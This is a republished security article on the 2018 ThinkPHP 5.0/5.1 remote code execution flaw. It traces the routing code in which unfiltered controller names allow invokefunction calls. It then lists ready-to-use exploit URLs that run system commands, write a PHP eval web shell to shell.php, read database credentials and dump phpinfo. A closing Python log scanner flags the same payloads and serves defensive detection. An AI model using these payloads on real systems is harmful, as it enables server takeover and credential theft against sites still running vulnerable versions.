2025-04-05 Update From: SLTechnology News&Howtos (Network Security)
Shulou(Shulou.com)06/01 Report--
On December 11, 2018, exploit-db published a remote code execution vulnerability in the ThinkPHP framework.
Exploit address: https://www.exploit-db.com/exploits/45978
Because the framework does not sufficiently validate the controller name, remote code execution (getshell) is possible when forced routing is not enabled.
Affected versions:
ThinkPHP 5.1.0-5.1.31
ThinkPHP 5.0.5-5.0.23
Installation:
Download address: http://www.thinkphp.cn/donate/download/id/1125.html
Download it and decompress it into the /var/www/html/ directory.
Vulnerability analysis
thinkphp/library/think/App.php, line 120
Route detection is done through the self::routeCheck function.
From there we enter the $request->path() function.
thinkphp/library/think/Request.php, line 416
Enter the pathinfo() function and continue tracing to line 384.
Config::get('var_pathinfo') reads the parameter name set in the configuration file; its default value is s. The value of that GET key is taken as the pathinfo and assigned to $path in routeCheck.
Now go back to App.php, line 606.
Route detection is performed here. After $check is evaluated we enter the else branch, which imports the route configuration and then performs the URL route check, storing the dispatch result in $result. If dispatch fails and forced routing ($must) is enabled, an invalid-route exception is thrown; otherwise Route::parseUrl is entered to resolve the operation from $path (the custom URL).
Now trace the parseUrl function.
thinkphp/library/think/Route.php, line 1208
Enter the parseUrlPath function, line 1275.
Here the URL is split on the separator into a module/controller/operation array and returned (line 1217).
Back in parseUrl, the returned array is assigned to $path, the routing information is extracted from it and packed into $route, which is finally returned.
thinkphp/library/think/App.php, line 120
Enter the self::exec function, line 445.
The module/controller/operation dispatch type is handled by self::module.
Now trace the module function, line 494.
Because $config['app_multi_module'] is set, multi-module deployment is used; $bind is NULL, so the elseif branch checks whether the module is in the deny list $config['deny_module_list']. If the module exists, $available = true and no exception is thrown.
At the return of the module function, $controller has never been filtered, so it can be think\app; the function then returns self::invokeMethod($call, $vars).
Enter the self::invokeMethod function, line 329.
The $call passed in is $method, an array whose first element is a think\App object and whose second element is the method name string invokefunction; the corresponding method of that object is then obtained via ReflectionMethod.
The passed parameters, i.e. the payload, are then collected by $args = self::bindParams($reflect, $vars).
Finally, $reflect->invokeArgs($args) is called, passing the payload array into invokeFunction through the reflection object, which completes the code execution.
At this point, the analysis of the ThinkPHP remote code execution vulnerability is complete.
Vulnerability exploitation
Http://xxx.xxx.xxx( here is your domain name) / public/index.php?s=index/think\ app/invokefunction&function=call_user_func_array&vars [0] = system&vars [1] [] = whoami
Executes the command whoami (the whoami at the end of the link can be replaced with another command; special characters can be URL-encoded).
Http://xxx.xxx.xxx/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
Outputs phpinfo() information through the phpinfo function.
Http://xxx.xxx.xxx/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^%3C?php%20@eval($_GET[%22snowwolf%22])?^%3E%3Eshell.php
Writes a web shell (shell.php).
Http://xxx.xxx.xxx/public/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100
Also displays phpinfo.
Http://xxx.xxxx.xxx/thinkphp/public//?s=.|think\config/get&name=database.username
Reads the database username (change username to password to read the database password).
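As an added defensive example (not code from the original article or from ThinkPHP), the script below mimics the module/controller/operation split described in the analysis and applies to the controller segment the rule that the patched releases (5.0.24 and 5.1.32) enforce in App::module(), `^[A-Za-z](\w|\.)*$`, which rejects the backslash-bearing names used by the payloads above. It runs over constructed access-log lines; the log format, client IPs and the fallback to the path after index.php are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Controller-name rule enforced by the patched ThinkPHP releases (5.0.24 / 5.1.32):
# the controller must start with a letter and contain only word characters or dots.
SAFE_CONTROLLER = re.compile(r'^[A-Za-z](\w|\.)*$')
VAR_PATHINFO = 's'  # default var_pathinfo, as noted in the analysis above
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')

def split_pathinfo(pathinfo):
    """Mimic Route::parseUrlPath: '|' and '/' both separate module/controller/action."""
    parts = pathinfo.replace('|', '/').strip('/').split('/')
    parts += [''] * (3 - len(parts))
    return dict(zip(('module', 'controller', 'action'), parts))

def extract_pathinfo(request_target):
    """Recover the pathinfo as Request::pathinfo() does: the var_pathinfo GET
    parameter wins; otherwise (assumption) use the path segment after index.php."""
    url = urlsplit(request_target)
    query = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
    if VAR_PATHINFO in query:
        return query[VAR_PATHINFO][0]
    return unquote(url.path.partition('index.php')[2])

def is_suspicious(request_target):
    """True when the controller segment would fail the patched check (e.g. has a backslash)."""
    controller = split_pathinfo(extract_pathinfo(request_target))['controller']
    return bool(controller) and not SAFE_CONTROLLER.match(controller)

def scan_access_log(lines):
    """Return (client_ip, request_target) for every request with an unsafe controller name."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if m and is_suspicious(m.group(1)):
            hits.append((line.split(' ', 1)[0], m.group(1)))
    return hits

# Constructed sample lines in Apache combined format (not real traffic): the first three carry
# the payload shapes shown above (one percent-encoded), the last two are ordinary requests.
SAMPLE_LOG = [
    '203.0.113.7 - - [11/Dec/2018:10:02:11 +0000] "GET /public/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 200 512',
    '203.0.113.7 - - [11/Dec/2018:10:02:15 +0000] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=phpinfo&vars[0]=100 HTTP/1.1" 200 80412',
    '198.51.100.4 - - [11/Dec/2018:10:05:40 +0000] "GET /thinkphp/public//?s=.|think\\config/get&name=database.username HTTP/1.1" 200 30',
    '192.0.2.9 - - [11/Dec/2018:10:06:01 +0000] "GET /public/index.php?s=index/user/login HTTP/1.1" 200 1024',
    '192.0.2.9 - - [11/Dec/2018:10:06:03 +0000] "GET /public/index.php/index/user.profile/show HTTP/1.1" 200 2048',
]
if __name__ == '__main__':
    for ip, target in scan_access_log(SAMPLE_LOG):
        print(f'{ip}  {target}')
```

The same `is_suspicious` check can be fed from a WAF or reverse proxy, and the regex is the one to add to App::module() when a 5.0.x/5.1.x install cannot be upgraded.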